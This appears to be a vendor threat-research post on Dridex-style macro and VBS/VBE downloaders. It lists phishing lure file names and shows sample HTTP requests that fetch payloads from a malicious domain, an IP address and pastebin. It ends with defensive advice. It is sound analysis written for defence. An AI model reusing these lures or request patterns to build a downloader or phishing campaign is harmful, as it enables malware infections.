Threat Research
Macros Galore

The recent FBI announcement of the Dridex botnet take-down and the arrest of its administrator doesn’t mean email users will see the last of Dridex. We might see the reuse of similar phishing tactics with future malware. We have seen an overall slowdown in Dridex in recent months ever since its first noticeable Dridex campaigns in early 2015. However, throughout October we have observed a rise in the use phishing documents with embedded macros used as first stage macro downloaders such as Banload. We shouldn’t lose sight of successful social engineering and evasion methods used by this botnet just because it was taken down.
What Does a Macro Downloader Do?
These campaigns are multistage downloaders whose typical infiltration methods consist of social engineered emails that contain disguised attachments. Attachments typically consist of file types that allow the execution of embedded Visual Basic (VB)code, including Visual Basic script (.vbs) files, VBScript Encoded (.vbe) files, and Microsoft Office documents with embedded Visual Basic macros. When the code executes, it contacts a server to download and execute the malware payload. This method has frequently been used to install malware such as Dridex, Dyre, and Banload. Figure 1 illustrates the downloader concept.
Figure 1. The concept of the downloader
Email Body
Figure 2. An example of a phishing email
The phishing emails focus on convincing the user to download and open the attachments; Figure 2 shows an example. Attachment names usually correspond to the email subject and include a randomized number at the end of the file name. Spam campaign themes often refer to picture and movie files, government documents, potentially sensitive information such as court papers, resumes, and shipment orders. Here are a few file names used in recent campaigns:
Mirian_resume_1700.doc
ACH_Payment_0067855YKwcod..vbs
remit network
report.pdf.vbs
adam.champion_OK_5072.doc
marketing.it_GO_1793.doc
ian.marchant_QR_4940.doc
janetcard_FE700F.xls
2via_Boleto_Ref-01237.vbs
DSC283751726313.vbs
MOV90472251.vbs
Proposta_comercial00734133.vbs
Rendimentos1827349154.vbs
pendencias01726324.vbe
comunicado01726315.vbe
SolicitaÆo_de_2¦_via_Boleto_pdf.vbe
Arquivo_Comprovante_deposito0128971256.vbe
Microsoft Office documents containing macros are often password protected, while VBS/VBE files are obfuscated beyond readability, as shown in Figure 3. Both methods may allow the files to evade antivirus detection. VBS and VBE files will execute immediately upon opening, as will Office macros if the victim has macros enabled. Otherwise, the victim will receive a prompt asking if they want to run the macro.
Figure 3. Dridex ActiveMime
Figure 4. Obfuscated VisualBasic script (.vbs) file
HTTP Request Variation
The downloaders make HTTP GET or HTTP POST requests to retrieve the malware payload. However, as shown in Figure 4, the details of the request vary widely across samples. This makes it harder to create network-based signatures and helps the downloader avoid detection. Notice in Example 2 below that the “GET” request uses a double “EE.”
Example 1
GET /01/hits.html HTTP/1.1
Connection:
Keep-Alive
Content-Type: text/plain; Charset=UTF-8
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32;
WinHttp.WinHttpRequest.5)
Host: sfgbfhysf.systemy1201.in
Example 2
GEET /bt/bt/sp_index.php HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; InfoPath.2)
Host: 136.243.219.233
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
Example 3
POST /download.php?i=V8XHfsL1 HTTP/1.1
Accept: */*Accept-Encoding: gzip, deflate
User-Agent:
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0;
SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729;
Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Host:
pastebin.com
Content-Length: 0
Connection:
Keep-Alive
Cache-Control: no-cache
Unique Malicious VBS/VBE Since August 2015
Even after the announcement of the Dridex botnet take-down, we are still seeing the use of Visual Basic downloaders. In Figure 5, the red area represents the number of unique hashes seen by FireEye, while the blue area represents the portion seen by open source malware repositories. The average lag time is 47 hours between when a sample was first seen by FireEye and when it was first seen in the open source repository.
Figure 5. First Seen Fireeye vs. Open Source Repository
Figure 6. Distribution of Malware Based on File Types
Malicious VBS/VBE Downloaders Seen Across Various Industries
Spam campaigns, by their nature, are broad-based and generally have no specific target. However, this also means that they can potentially impact any organization. Figure 7 shows that campaigns involving VBS/VBE downloaders are seen across numerous industries. Some industries may also have fortified their networks with well-known anti-virus solutions; however, it’s the beauty of dynamic and generic detection that catches the first instance of malware.
Figure 7. Distribution of VBS/VBE downloaders across industries
How to Avoid Future Dridex-like Malware?
FireEye recommends:
- Always confirm the identity or source of the email.
- Verify that attachment file extensions reflect the actual file type.
- Modify security policies to disable the use of macros.
- Educate users to disable or implement macro security in Office applications.
- Consider a detection system that has the ability to detect multistage malware in phishing and spam campaigns, like the FireEye Email Security Solution.
[1] https://www.fbi.gov/pittsburgh/press-releases/2015/bugat-botnet-administrator-arrested-and-malware-disabled